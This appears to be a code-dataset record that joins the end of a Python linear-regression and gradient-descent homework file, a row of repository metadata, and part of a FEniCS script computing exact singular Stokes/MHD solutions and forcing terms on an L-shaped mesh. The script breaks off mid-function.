        :param mu: l2 coefficient
        """
        super().__init__(w0=w0, lambda_=lambda_, eps=eps, s0=s0, p=p)
        self.mu = mu

    def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
        """Delegate the step to the unregularized parent update rule."""
        return super().update_weights(gradient, iteration)

    def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
        """Parent gradient plus the gradient of the l2 penalty.

        d/dw (mu/2 * ||w||^2) = mu * w, so l2 = w here and it is scaled by
        self.mu below.  NOTE(review): if the penalty is defined as
        mu * ||w||^2, the term should be 2 * w — confirm against the spec.
        """
        l2 = self.w
        return super().calc_gradient(X, y) + l2 * self.mu
class LinearRegression:
    """
    Linear regression class
    """

    def __init__(self, descent, tolerance: float = tolerance_default, max_iter: int = max_iter_default):
        """
        :param descent: Descent class
        :param tolerance: float stopping criterion for square of euclidean norm of weight difference
        :param max_iter: int stopping criterion for iterations
        """
        self.descent = descent
        self.tolerance = tolerance
        self.max_iter = max_iter
        # MSE recorded before the first step and after every update.
        self.loss_history = []

    # NOTE: the return annotation is quoted because LinearRegression is not
    # bound yet while the class body executes (safe with or without
    # `from __future__ import annotations`).
    def fit(self, X: np.ndarray, y: np.ndarray) -> 'LinearRegression':
        """
        Getting objects, fitting descent weights.

        Runs at most max_iter descent steps, stopping early when the squared
        euclidean norm of the weight difference drops below tolerance or the
        weights diverge to NaN.

        :param X: objects' features
        :param y: objects' target
        :return: self
        """
        self.calc_loss(X, y)
        for iteration in range(self.max_iter):
            gradient = self.descent.calc_gradient(X, y)
            weight_diff = self.descent.update_weights(gradient, iteration)
            self.calc_loss(X, y)
            # Divergence guard: stop once the weights blow up to NaN.
            if np.isnan(weight_diff).any():
                break
            if weight_diff @ weight_diff < self.tolerance:
                break
        return self

    def predict(self, X: np.ndarray) -> np.ndarray:
        """
        Getting objects, predicting targets.

        :param X: objects' features
        :return: predicted targets X @ w
        """
        return X @ self.descent.w

    def calc_loss(self, X: np.ndarray, y: np.ndarray) -> None:
        """
        Getting objects, calculating MSE loss and appending it to loss_history.

        :param X: objects' features
        :param y: objects' target
        """
        residual = self.predict(X) - y
        self.loss_history.append(residual @ residual / X.shape[0])
###########################################################
####################### BONUS TASK ########################
###########################################################
class StochasticAverageGradient(BaseDescent):
    """
    Stochastic average gradient class (BONUS TASK)
    """

    def __init__(self, w0: np.ndarray, lambda_: float, x_shape: int, s0: float = s0_default, p: float = p_default):
        """
        :param w0: weight initialization
        :param lambda_: learning rate parameter (float)
        :param x_shape: number of training objects — one stored gradient row per object
        :param s0: learning rate parameter (float)
        :param p: learning rate parameter (float)
        """
        super().__init__()
        # Decaying step-size schedule: eta_k = lambda_ * (s0 / (s0 + k)) ** p.
        self.eta = lambda k: lambda_ * (s0 / (s0 + k)) ** p
        self.w = np.copy(w0)
        # v[i] holds the last gradient computed for object i; d accumulates
        # their running sum (scalar 0 broadcasts on first use).
        self.v = np.zeros((x_shape, w0.shape[0]))
        self.d = 0

    def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
        """
        Changing weights with respect to gradient

        :param iteration: iteration number
        :param gradient: gradient
        :return: weight difference: np.ndarray
        """
        # TODO: implement updating weights function
        # (error message fixed: it previously named GradientDescent)
        raise NotImplementedError('StochasticAverageGradient update_weights function not implemented')

    def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
        """
        Getting objects, calculating gradient at point w

        :param X: objects' features
        :param y: objects' targets
        :return: gradient: np.ndarray
        """
        # TODO: implement calculating gradient function
        # (error message fixed: it previously named GradientDescent)
        raise NotImplementedError('StochasticAverageGradient calc_gradient function not implemented')
###########################################################
####################### BONUS TASK ########################
###########################################################
| 34.578005
| 115
| 0.610651
| 1,505
| 13,520
| 5.344186
| 0.093023
| 0.089519
| 0.033818
| 0.048489
| 0.77869
| 0.761407
| 0.734925
| 0.725973
| 0.711923
| 0.70608
| 0
| 0.010298
| 0.267382
| 13,520
| 390
| 116
| 34.666667
| 0.801716
| 0.321967
| 0
| 0.507937
| 0
| 0
| 0.09016
| 0
| 0
| 0
| 0
| 0.04359
| 0
| 1
| 0.277778
| false
| 0.015873
| 0.015873
| 0.031746
| 0.452381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ea219a7c8958eb882b83c3631f8f4dfbe2baf560
| 38,558
|
py
|
Python
|
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitMatrix/ScottTest/Lshaped/Laplacian/Lshaped.py
|
wathen/PhD
|
35524f40028541a4d611d8c78574e4cf9ddc3278
|
[
"MIT"
] | 3
|
2020-10-25T13:30:20.000Z
|
2021-08-10T21:27:30.000Z
|
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitMatrix/ScottTest/Lshaped/Laplacian/Lshaped.py
|
wathen/PhD
|
35524f40028541a4d611d8c78574e4cf9ddc3278
|
[
"MIT"
] | null | null | null |
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitMatrix/ScottTest/Lshaped/Laplacian/Lshaped.py
|
wathen/PhD
|
35524f40028541a4d611d8c78574e4cf9ddc3278
|
[
"MIT"
] | 3
|
2019-10-28T16:12:13.000Z
|
2020-01-13T13:59:44.000Z
|
import petsc4py
import sys
petsc4py.init(sys.argv)
from petsc4py import PETSc
import mshr
from dolfin import *
import sympy as sy
import numpy as np
import ExactSol
import MatrixOperations as MO
import CheckPetsc4py as CP
def Domain(n):
    """Build the L-shaped mesh and mark its boundary facets.

    Crops a 'crossed' RectangleMesh on [-1,1]^2 down to the L-shape by
    flagging and removing the cells of one quadrant, then marks facets:
    1 on the Dirichlet sides, 2 on the right boundary.

    :param n: number of mesh divisions per coordinate direction
    :return: (mesh, boundaries, domains) — submesh, facet markers, cell markers
    """
    # defining the L-shaped domain
    # domain = mshr.Rectangle(Point(-1., -1.), Point(1., 1.)) - mshr.Rectangle(Point(0., -1.), Point(1., 0.) )
    # mesh = mshr.generate_mesh(domain, n)
    mesh = RectangleMesh(-1,-1,1,1,n,n, 'crossed')
    cell_f = CellFunction('size_t', mesh, 0)
    for cell in cells(mesh):
        # Triangle vertex coordinates come flattened as [x0, y0, x1, y1, x2, y2].
        v = cell.get_vertex_coordinates()
        # NOTE(review): even offsets are the x-coordinates in DOLFIN's layout,
        # yet they are assigned to `y` (and odd ones to `x`) — presumably a
        # deliberate swap matched by the condition below; verify.
        y = v[np.arange(0,6,2)]
        x = v[np.arange(1,6,2)]
        xone = np.ones(3)
        xone[x > 0] = 0
        yone = np.ones(3)
        yone[y < 0] = 0
        # Flag (set to 1) cells whose three vertices all satisfy x <= 0 and
        # y >= 0 in the swapped naming above; 5.5 < 6 tolerates float noise.
        if np.sum(xone)+ np.sum(yone)>5.5:
            cell_f[cell] = 1
    # Keep only the unflagged cells — this submesh is the L-shape.
    mesh = SubMesh(mesh, cell_f, 0)
    # cell_markers = CellFunction("bool", mesh)
    # cell_markers.set_all(False)
    # origin = Point(0., 0.)
    # for cell in cells(mesh):
    # p = cell.midpoint()
    # if abs(p.distance(origin)) < 0.6:
    # cell_markers[cell] = True
    # mesh = refine(mesh, cell_markers)
    # cell_markers = CellFunction("bool", mesh)
    # cell_markers.set_all(False)
    # origin = Point(0., 0.)
    # for cell in cells(mesh):
    # p = cell.midpoint()
    # if abs(p.distance(origin)) < 0.4:
    # cell_markers[cell] = True
    # mesh = refine(mesh, cell_markers)
    # cell_markers = CellFunction("bool", mesh)
    # cell_markers.set_all(False)
    # origin = Point(0., 0.)
    # for cell in cells(mesh):
    # p = cell.midpoint()
    # if abs(p.distance(origin)) < 0.2:
    # cell_markers[cell] = True
    # mesh = refine(mesh, cell_markers)
    # Creating classes that define the boundary of the domain
    class Left(SubDomain):
        def inside(self, x, on_boundary):
            return near(x[0], -1.0)

    class Right(SubDomain):
        def inside(self, x, on_boundary):
            return near(x[0], 1.0)

    class Bottom(SubDomain):
        def inside(self, x, on_boundary):
            return near(x[1], -1.0)

    class Top(SubDomain):
        def inside(self, x, on_boundary):
            return near(x[1], 1.0)

    # The two re-entrant-corner edges of the L-shape (x = 0 and y = 0 lines).
    class CornerTop(SubDomain):
        def inside(self, x, on_boundary):
            return near(x[1], 0.0)

    class CornerLeft(SubDomain):
        def inside(self, x, on_boundary):
            return near(x[0], 0.0)

    left = Left()
    top = Top()
    right = Right()
    bottom = Bottom()
    cleft = CornerLeft()
    ctop = CornerTop()
    # Initialize mesh function for the domain
    domains = CellFunction("size_t", mesh)
    domains.set_all(0)
    # Initialize mesh function for boundary domains
    boundaries = FacetFunction("size_t", mesh)
    boundaries.set_all(0)
    # Marker 1: Dirichlet sides (including the corner edges); marker 2: right side.
    left.mark(boundaries, 1)
    top.mark(boundaries, 1)
    bottom.mark(boundaries, 1)
    cleft.mark(boundaries, 1)
    ctop.mark(boundaries, 1)
    right.mark(boundaries, 2)
    return mesh, boundaries, domains
# functions that perform partial derivatives of x and y with respect to polar coordinates
def polarx(u, rho, phi):
    """Partial derivative of u with respect to Cartesian x, expressed in
    polar coordinates (rho, phi) via the chain rule:
        u_x = cos(phi) * u_rho - sin(phi)/rho * u_phi
    """
    du_drho = sy.diff(u, rho)
    du_dphi = sy.diff(u, phi)
    return sy.cos(phi)*du_drho - (1./rho)*sy.sin(phi)*du_dphi
def polary(u, rho, phi):
    """Partial derivative of u with respect to Cartesian y, expressed in
    polar coordinates (rho, phi) via the chain rule:
        u_y = sin(phi) * u_rho + cos(phi)/rho * u_phi
    """
    du_drho = sy.diff(u, rho)
    du_dphi = sy.diff(u, phi)
    return sy.sin(phi)*du_drho + (1./rho)*sy.cos(phi)*du_dphi
def Solution(mesh, params):
    """Build the exact solution fields and forcing terms on the L-shaped domain.

    The exact velocity (u, v), pressure p, magnetic field (b, d) and
    multiplier r are defined symbolically in polar coordinates (rho, phi)
    with sympy, converted to C code strings and wrapped in DOLFIN
    Expressions.  Nested Expression subclasses then evaluate those polar
    formulas at Cartesian points, fixing the atan2 branch and guarding the
    corner singularity at the origin.

    :param mesh: DOLFIN mesh of the L-shaped domain
    :param params: sequence of physical parameters; params[0] scales the
                   coupling terms (presumably a coupling number — confirm)
    :return: (u0, p0, b0, r0, F_NS, F_M, F_MX, F_S, gradu0, Neumann, p0vec)
    """
    # Singular exponent for the re-entrant corner of opening omega = 3*pi/2.
    l = 0.54448373678246
    omega = (3./2)*np.pi
    # Symbols are named 'x[1]'/'x[0]' so sy.ccode output plugs directly into
    # DOLFIN Expression strings (x[0] = rho, x[1] = phi).
    phi = sy.symbols('x[1]')
    rho = sy.symbols('x[0]')
    z = sy.symbols('z')
    # looked at all the exact solutions and they seems to be the same as the paper.....
    psi = (sy.sin((1+l)*phi)*sy.cos(l*omega))/(1+l) - sy.cos((1+l)*phi) - (sy.sin((1-l)*phi)*sy.cos(l*omega))/(1-l) + sy.cos((1-l)*phi)
    psi_prime = sy.diff(psi, phi)
    psi_3prime = sy.diff(psi, phi, phi, phi)
    # Exact velocity components and pressure of the singular Stokes solution.
    u = rho**l*((1+l)*sy.sin(phi)*psi + sy.cos(phi)*psi_prime)
    v = rho**l*(-(1+l)*sy.cos(phi)*psi + sy.sin(phi)*psi_prime)
    uu0 = Expression((sy.ccode(u),sy.ccode(v)))
    p = -rho**(l-1)*((1+l)**2*psi_prime + psi_3prime)/(1-l)
    pu0 = Expression(sy.ccode(p))
    # Magnetic potential f; the field (b, d) is its Cartesian gradient.
    f = rho**(2./3)*sy.sin((2./3)*phi)
    # b = sy.diff(f,rho)#
    b = polarx(f, rho, phi)
    # d = (1./rho)*sy.diff(f,phi)#
    d = polary(f, rho, phi)
    bu0 = Expression((sy.ccode(b),sy.ccode(d)))
    # Multiplier r is identically zero (derivative of phi w.r.t. rho).
    r = sy.diff(phi,rho)
    ru0 = Expression(sy.ccode(r))
    # Defining polarx and polary as the x and y derivatives with respect to polar coordinates (rho, phi). Writing the right handside with respect to cartesian coords
    #Laplacian
    L1 = polarx(polarx(u, rho, phi), rho, phi) + polary(polary(u, rho, phi), rho, phi)
    L2 = polarx(polarx(v, rho, phi), rho, phi) + polary(polary(v, rho, phi), rho, phi)
    # Advection
    A1 = u*polarx(u, rho, phi)+v*polary(u, rho, phi)
    A2 = u*polarx(v, rho, phi)+v*polary(v, rho, phi)
    # Pressure gradient
    P1 = polarx(p, rho, phi)
    P2 = polary(p, rho, phi)
    # Curl-curl
    C1 = polarx(polary(d, rho, phi), rho, phi) - polary(polary(b, rho, phi), rho, phi)
    C2 = polarx(polary(b, rho, phi), rho, phi) - polary(polary(d, rho, phi), rho, phi)
    # Multiplier gradient
    R1 = sy.diff(r, rho)
    R2 = sy.diff(r, rho)
    # Coupling term for fluid variables
    NS1 = -d*(polarx(d, rho, phi)-polary(b, rho, phi))
    NS2 = b*(polarx(d, rho, phi)-polary(b, rho, phi))
    # Coupling term for Magnetic variables
    M1 = polary(u*d-v*b, rho, phi)
    M2 = -polarx(u*d-v*b, rho, phi)
    # Using https://en.wikipedia.org/wiki/Del_in_cylindrical_and_spherical_coordinates defintitions of the derivative operators (sy.diff(u,rho) means partial derivative of u with respect to rho)
    # Second formulation of the same operators, directly in cylindrical form;
    # the commented "limits" block below was used to cross-check the two.
    # Laplacian
    L11 = (1./rho)*sy.diff(rho*sy.diff(u,rho),rho) + (1./(rho**2))*sy.diff(sy.diff(u,phi),phi) - (1./rho**2)*u - (2./rho**2)*sy.diff(v, phi)
    L22 = (1./rho)*sy.diff(rho*sy.diff(v,rho),rho) + (1./(rho**2))*sy.diff(sy.diff(v,phi),phi) - (1./rho**2)*v + (2./rho**2)*sy.diff(u, phi)
    # Advection
    A11 = u*sy.diff(u, rho) + (1./rho)*v*sy.diff(u, phi) - u**2/rho
    A22 = u*sy.diff(v, rho) + (1./rho)*v*sy.diff(v, phi) + v*u/rho
    # Pressure gradient
    P11 = sy.diff(p, rho)
    P22 = (1./rho)*sy.diff(p, phi)
    # Curl-curl
    c = (1./rho)*(sy.diff(rho*d, rho) - sy.diff(b, phi))
    C11 = (1./rho)*sy.diff(c, phi)
    C22 = -sy.diff(c, rho)
    # Multiplier gradient
    R11 = sy.diff(r, rho)
    R22 = sy.diff(r, rho)
    # Coupling term for fluid variables
    NS11 = -c*d
    NS22 = c*b
    # Coupling term for Magnetic variables
    c = u*d-v*b
    M11 = (1./rho)*sy.diff(c, phi)
    M22 = -sy.diff(c, rho)
    # Divergence of the velocity in polar coordinates (not used below).
    FF = sy.diff(u, rho) + (1./rho)*sy.diff(v, phi)
    # print "\n\n\nL limits \n\n"
    # print sy.limit(L1, rho,0), sy.limit(sy.limit(L1, phi,0),rho,0)
    # print sy.limit(L11, rho,0), sy.limit(sy.limit(L11, phi,0),rho,0)
    # print "\n", sy.limit(L2, rho,0), sy.limit(sy.limit(L2, phi,0),rho,0)
    # print sy.limit(L22, rho,0), sy.limit(sy.limit(L22, phi,0),rho,0)
    # print "\n\n\nA limits \n\n"
    # print sy.limit(A1, rho,0), sy.limit(sy.limit(A1, phi,0),rho,0)
    # print sy.limit(A11, rho,0), sy.limit(sy.limit(A11, phi,0),rho,0)
    # print "\n", sy.limit(A2, rho,0), sy.limit(sy.limit(A2, phi,0),rho,0)
    # print sy.limit(A22, rho,0), sy.limit(sy.limit(A22, phi,0),rho,0)
    # print "\n\n\nP limits \n\n"
    # print sy.limit(P1, rho,0), sy.limit(sy.limit(P1, phi,0),rho,0)
    # print sy.limit(P11, rho,0), sy.limit(sy.limit(P11, phi,0),rho,0)
    # print "\n", sy.limit(P2, rho,0), sy.limit(sy.limit(P2, phi,0),rho,0)
    # print sy.limit(P22, rho,0), sy.limit(sy.limit(P22, phi,0),rho,0)
    # print "\n\n\nC limits \n\n"
    # print sy.limit(C1, rho,0), sy.limit(sy.limit(C1, phi,0),rho,0)
    # print sy.limit(C11, rho,0), sy.limit(sy.limit(C11, phi,0),rho,0)
    # print "\n", sy.limit(C2, rho,0), sy.limit(sy.limit(C2, phi,0),rho,0)
    # print sy.limit(C22, rho,0), sy.limit(sy.limit(C22, phi,0),rho,0)
    # print "\n\n\nR limits \n\n"
    # print sy.limit(R1, rho,0), sy.limit(sy.limit(R1, phi,0),rho,0)
    # print sy.limit(R11, rho,0), sy.limit(sy.limit(R11, phi,0),rho,0)
    # print "\n", sy.limit(R2, rho,0), sy.limit(sy.limit(R2, phi,0),rho,0)
    # print sy.limit(R22, rho,0), sy.limit(sy.limit(R22, phi,0),rho,0)
    # print "N\n\n\nS limits \n\n"
    # print sy.limit(NS1, rho,0), sy.limit(sy.limit(NS1, phi,0),rho,0)
    # print sy.limit(NS11, rho,0), sy.limit(sy.limit(NS11, phi,0),rho,0)
    # print "\n", sy.limit(NS2, rho,0), sy.limit(sy.limit(NS2, phi,0),rho,0)
    # print sy.limit(NS22, rho,0), sy.limit(sy.limit(NS22, phi,0),rho,0)
    # print "\n\n\nM limits \n\n"
    # print sy.limit(M1, rho,0), sy.limit(sy.limit(M1, phi,0),rho,0)
    # print sy.limit(M11, rho,0), sy.limit(sy.limit(M11, phi,0),rho,0)
    # print "\n", sy.limit(M2, rho,0), sy.limit(sy.limit(M2, phi,0),rho,0)
    # print sy.limit(M22, rho,0), sy.limit(sy.limit(M22, phi,0),rho,0)
    # print "\n\n\Fluid limits \n\n"
    # print sy.limit(u, rho,0), sy.limit(sy.limit(u, phi,0),rho,0)
    # print sy.limit(v, rho,0), sy.limit(sy.limit(v, phi,0),rho,0)
    # print sy.limit(p, rho,0), sy.limit(sy.limit(p, phi,0),rho,0)
    # print "\n\n\nVelocity limits \n\n"
    # print sy.limit(b, rho,0), sy.limit(sy.limit(b, phi,0),rho,0)
    # print sy.limit(d, rho,0), sy.limit(sy.limit(d, phi,0),rho,0)
    # print sy.limit(r, rho,0), sy.limit(sy.limit(r, phi,0),rho,0)
    # ssss
    # graduu0 = Expression(sy.ccode(sy.diff(u, rho) + (1./rho)*sy.diff(u, phi)))
    # Wrap the cylindrical-form operators as DOLFIN Expressions.
    graduu0 = Expression((sy.ccode(sy.diff(u, rho)),sy.ccode(sy.diff(v, rho))))
    Laplacian = Expression((sy.ccode(L11),sy.ccode(L22)))
    Advection = Expression((sy.ccode(A11),sy.ccode(A22)))
    gradPres = Expression((sy.ccode(P11),sy.ccode(P22)))
    CurlCurl = Expression((sy.ccode(C11),sy.ccode(C22)))
    gradR = Expression((sy.ccode(R11).replace('M_PI','pi'),sy.ccode(R22).replace('M_PI','pi')))
    NS_Couple = Expression((sy.ccode(NS11),sy.ccode(NS22)))
    M_Couple = Expression((sy.ccode(M11),sy.ccode(M22)))
    # ignore this! Just removes the singularity (atan2(0,0) = NaN) and makes all functions zero at the origin
    # Legacy DOLFIN user-Expression API: subclass with eval_cell/value_shape.
    class u0(Expression):
        def __init__(self, mesh, uu0):
            self.mesh = mesh
            self.u0 = uu0
        def eval_cell(self, values, x, ufc_cell):
            # if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
            # values[0] = 0.0
            # values[1] = 0.0
            # else:
            r = sqrt(x[0]**2 + x[1]**2)
            theta = np.arctan2(x[1],x[0])
            # print theta
            # Map atan2's (-pi, pi] branch onto [0, 2*pi) for the L-shape.
            if theta < 0:
                theta += 2*np.pi
            values[0] = self.u0(r, theta)[0]
            values[1] = self.u0(r,theta)[1]
        def value_shape(self):
            return (2,)
    class gradu0(Expression):
        def __init__(self, mesh, graduu0):
            self.mesh = mesh
            self.gradu0 = graduu0
        def eval_cell(self, values, x, ufc_cell):
            # if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
            # values = 0.0
            # else:
            r = sqrt(x[0]**2 + x[1]**2)
            theta = np.arctan2(x[1],x[0])
            if theta < 0:
                theta += 2*np.pi
            # NOTE(review): this rebinds the local name `values` instead of
            # writing into the provided buffer (values[...] = ...) — likely a
            # latent bug; confirm whether gradu0 is ever evaluated.
            values = self.gradu0(r,theta)
    class p0(Expression):
        def __init__(self, mesh, pu0):
            self.mesh = mesh
            self.p0 = pu0
        def eval_cell(self, values, x, ufc_cell):
            # if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
            # values[0] = 0.0
            # else:
            r = sqrt(x[0]**2 + x[1]**2)
            theta = np.arctan2(x[1],x[0])
            if theta < 0:
                theta += 2*np.pi
            values[0] = self.p0(r,theta)
        def eval(self, values, x):
            # if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
            # values = 0.0
            # else:
            r = sqrt(x[0]**2 + x[1]**2)
            theta = np.arctan2(x[1],x[0])
            if theta < 0:
                theta += 2*np.pi
            values[0] = self.p0(r,theta)
    # Same scalar pressure duplicated into both components of a vector field.
    class p0Vec(Expression):
        def __init__(self, mesh, pu0):
            self.mesh = mesh
            self.p0 = pu0
        def eval_cell(self, values, x, ufc_cell):
            # if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
            # values[0] = 0.0
            # else:
            r = sqrt(x[0]**2 + x[1]**2)
            theta = np.arctan2(x[1],x[0])
            if theta < 0:
                theta += 2*np.pi
            values[0] = self.p0(r,theta)
            values[1] = self.p0(r,theta)
        def eval(self, values, x):
            # if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
            # values = 0.0
            # else:
            r = sqrt(x[0]**2 + x[1]**2)
            theta = np.arctan2(x[1],x[0])
            if theta < 0:
                theta += 2*np.pi
            values[0] = self.p0(r,theta)
            values[1] = self.p0(r,theta)
        # def value_shape(self):
        # return (1,)
    class b0(Expression):
        def __init__(self, mesh, bu0):
            self.mesh = mesh
            self.b0 = bu0
        def eval_cell(self, values, x, ufc_cell):
            # if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
            # values[0] = 0.0
            # values[1] = 0.0
            # else:
            r = sqrt(x[0]**2 + x[1]**2)
            theta = np.arctan2(x[1],x[0])
            if theta < 0:
                theta += 2*np.pi
            values[0] = self.b0(r, theta)[0]
            values[1] = self.b0(r,theta)[1]
            # print values
        def value_shape(self):
            return (2,)
    # Constant multiplier field r = 1.
    class r0(Expression):
        def __init__(self, mesh, element=None):
            self.mesh = mesh
        def eval(self, values, x):
            values[0] = 1.0
        # def value_shape(self):
        # return ( )
    # Navier-Stokes forcing: advection minus params[0]-scaled coupling term.
    class F_NS(Expression):
        def __init__(self, mesh, Laplacian, Advection, gradPres, NS_Couple, params):
            self.mesh = mesh
            self.Laplacian = Laplacian
            self.Advection = Advection
            self.gradPres = gradPres
            self.NS_Couple = NS_Couple
            self.params = params
        def eval_cell(self, values, x, ufc_cell):
            # Zero out the singular origin to avoid NaN from atan2(0, 0).
            if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
                values[0] = 0.0
                values[1] = 0.0
            else:
                r = sqrt(x[0]**2 + x[1]**2)
                theta = np.arctan2(x[1],x[0])
                if theta < 0:
                    theta += 2*np.pi
                values[0] = self.Advection(r,theta)[0] - self.params[0]*self.NS_Couple(r,theta)[0]
                values[1] = self.Advection(r,theta)[1] - self.params[0]*self.NS_Couple(r,theta)[1]
                # ssss
                # print values
        def value_shape(self):
            return (2,)
    # Stokes forcing: identically zero (Laplacian/gradPres kept but unused).
    class F_S(Expression):
        def __init__(self, mesh, Laplacian, gradPres, params):
            self.mesh = mesh
            self.Laplacian = Laplacian
            self.gradPres = gradPres
            self.params = params
        def eval_cell(self, values, x, ufc_cell):
            values[0] = 0
            values[1] = 0
            # print r, theta, self.Laplacian(r,theta)
        def value_shape(self):
            return (2,)
    # params[1]*params[0]*CurlCurl+gradR -params[0]*M_Couple
    # Maxwell forcing: only the params[0]-scaled coupling term survives.
    class F_M(Expression):
        def __init__(self, mesh, CurlCurl, gradR ,M_Couple, params):
            self.mesh = mesh
            self.CurlCurl = CurlCurl
            self.gradR = gradR
            self.M_Couple = M_Couple
            self.params = params
        def eval_cell(self, values, x, ufc_cell):
            if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
                values[0] = 0.0
                values[1] = 0.0
            else:
                r = sqrt(x[0]**2 + x[1]**2)
                theta = np.arctan2(x[1],x[0])
                if theta < 0:
                    theta += 2*np.pi
                values[0] = - self.params[0]*self.M_Couple(r,theta)[0]
                values[1] = - self.params[0]*self.M_Couple(r,theta)[1]
        def value_shape(self):
            return (2,)
    class F_MX(Expression):
        def __init__(self, mesh):
            self.mesh = mesh
        def eval_cell(self, values, x, ufc_cell):
            values[0] = 0.0
            values[1] = 0.0
        def value_shape(self):
            return (2,)
    # Neumann boundary data p*n - params[0]*grad(u)*n on the right boundary.
    class Neumann(Expression):
        def __init__(self, mesh, pu0, graduu0, params, n):
            self.mesh = mesh
            self.p0 = pu0
            self.gradu0 = graduu0
            self.params = params
            self.n = n
        def eval_cell(self, values, x, ufc_cell):
            if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
                values[0] = 2.0
                values[1] = 0.0
            else:
                # print x[0], x[1]
                r = sqrt(x[0]**2 + x[1]**2)
                theta = np.arctan2(x[1],x[0])
                if theta < 0:
                    theta += 2*np.pi
                # cell = Cell(self.mesh, ufc_cell.index)
                # print ufc_cell
                # n = cell.normal(ufc_cell.local_facet)
                # n = FacetNormal(self.mesh)
                # print self.n
                # sss
                values[0] = (self.p0(r,theta) - self.params[0]*self.gradu0(r,theta)[0])
                # print -(self.p0(r,theta) - self.params[0]*self.gradu0(r,theta))
                values[1] = -(self.params[0]*self.gradu0(r,theta)[1])
        def value_shape(self):
            return (2,)
    # class NeumannGrad(Expression):
    # def __init__(self, mesh, pu0, graduu0, params, n):
    # self.mesh = mesh
    # self.p0 = pu0
    # self.gradu0 = graduu0
    # self.params = params
    # self.n = n
    # def eval_cell(self, values, x, ufc_cell):
    # if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
    # values[0] = 2.0
    # values[1] = 0.0
    # else:
    # # print x[0], x[1]
    # r = sqrt(x[0]**2 + x[1]**2)
    # theta = np.arctan2(x[1],x[0])
    # if theta < 0:
    # theta += 2*np.pi
    # # cell = Cell(self.mesh, ufc_cell.index)
    # # print ufc_cell
    # # n = cell.normal(ufc_cell.local_facet)
    # # n = FacetNormal(self.mesh)
    # # print self.n
    # # sss
    # values[0] = -(self.p0(r,theta) - self.params[0]*self.gradu0(r,theta)[0])
    # # print -(self.p0(r,theta) - self.params[0]*self.gradu0(r,theta))
    # values[1] = (self.params[0]*self.gradu0(r,theta)[1])
    # def value_shape(self):
    # return (2,)
    # Instantiate the wrappers (each class name is shadowed by its instance).
    u0 = u0(mesh, uu0)
    p0 = p0(mesh, pu0)
    p0vec = p0Vec(mesh, pu0)
    b0 = b0(mesh, bu0)
    r0 = r0(mesh)
    F_NS = F_NS(mesh, Laplacian, Advection, gradPres, NS_Couple, params)
    F_M = F_M(mesh, CurlCurl, gradR, M_Couple, params)
    F_MX = F_MX(mesh)
    F_S = F_S(mesh, Laplacian, gradPres, params)
    gradu0 = gradu0(mesh, graduu0)
    Neumann = Neumann(mesh, pu0, graduu0, params, FacetNormal(mesh))
    # NeumannGrad = NeumannGrad(mesh, p0, graduu0, params, FacetNormal(mesh))
    return u0, p0, b0, r0, F_NS, F_M, F_MX, F_S, gradu0, Neumann, p0vec
def Solution2(mesh, params):
l = 0.54448373678246
omega = (3./2)*np.pi
phi = sy.symbols('x[1]')
rho = sy.symbols('x[0]')
z = sy.symbols('z')
# looked at all the exact solutions and they seems to be the same as the paper.....
psi = (sy.sin((1+l)*phi)*sy.cos(l*omega))/(1+l) - sy.cos((1+l)*phi) - (sy.sin((1-l)*phi)*sy.cos(l*omega))/(1-l) + sy.cos((1-l)*phi)
psi_prime = sy.diff(psi, phi)
psi_3prime = sy.diff(psi, phi, phi, phi)
u = rho**l*((1+l)*sy.sin(phi)*psi + sy.cos(phi)*psi_prime)
v = rho**l*(-(1+l)*sy.cos(phi)*psi + sy.sin(phi)*psi_prime)
uu0 = Expression((sy.ccode(u),sy.ccode(v)))
p = -rho**(l-1)*((1+l)**2*psi_prime + psi_3prime)/(1-l)
pu0 = Expression(sy.ccode(p))
f = rho**(2./3)*sy.sin((2./3)*phi)
# b = sy.diff(f,rho)#
b = polarx(f, rho, phi)
# d = (1./rho)*sy.diff(f,phi)#
d = polary(f, rho, phi)
bu0 = Expression((sy.ccode(b),sy.ccode(d)))
r = sy.diff(phi,rho)
ru0 = Expression(sy.ccode(r))
# Defining polarx and polary as the x and y derivatives with respect to polar coordinates (rho, phi). Writing the right handside with respect to cartesian coords
#Laplacian
L1 = polarx(polarx(u, rho, phi), rho, phi) + polary(polary(u, rho, phi), rho, phi)
L2 = polarx(polarx(v, rho, phi), rho, phi) + polary(polary(v, rho, phi), rho, phi)
# Advection
A1 = u*polarx(u, rho, phi)+v*polary(u, rho, phi)
A2 = u*polarx(v, rho, phi)+v*polary(v, rho, phi)
# Pressure gradient
P1 = polarx(p, rho, phi)
P2 = polary(p, rho, phi)
# Curl-curl
C1 = polarx(polary(d, rho, phi), rho, phi) - polary(polary(b, rho, phi), rho, phi)
C2 = polarx(polary(b, rho, phi), rho, phi) - polary(polary(d, rho, phi), rho, phi)
# Multiplier gradient
R1 = sy.diff(r, rho)
R2 = sy.diff(r, rho)
# Coupling term for fluid variables
NS1 = -d*(polarx(d, rho, phi)-polary(b, rho, phi))
NS2 = b*(polarx(d, rho, phi)-polary(b, rho, phi))
# Coupling term for Magnetic variables
M1 = polary(u*d-v*b, rho, phi)
M2 = -polarx(u*d-v*b, rho, phi)
